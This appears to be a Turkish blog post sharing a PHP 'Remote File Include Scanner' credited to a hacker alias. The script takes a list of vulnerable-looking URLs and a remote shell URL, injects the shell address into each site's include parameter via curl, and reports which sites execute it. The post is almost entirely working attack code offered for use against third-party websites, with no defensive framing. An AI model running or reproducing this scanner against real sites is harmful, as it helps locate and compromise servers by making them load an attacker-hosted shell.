Remote File Include Açıklarını taramak için kodladığım betik.
/*
Remote File Include Scanner
Kodlama by BLASTER
BLASTER.blogspot.com
*/
echo'
RFI taranacak sitelerin listesini yaziniz.
örnek: site.com/bla.php?include=
';
$liste=htmlspecialchars($_POST['liste']);
$shell=htmlspecialchars($_POST['shell']);
if($liste && $shell){
$satirlar=explode("\n",$liste);
foreach($satirlar as $s){
$tmz=trim($s);
$rfi=$tmz."".$shell;
ob_flush();
flush();
usleep(500000);
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_URL,$rfi);
$al=curl_exec($ch);
curl_close($ch);
if(eregi("safe",$al)){
echo $tmz.' -----> RFI eXploit
';
}else{echo $tmz.' -----> RFI yok.';}
}
}
?>
BLASTER' Dan Alıntıdır ...
0 yorum:
Yorum Gönder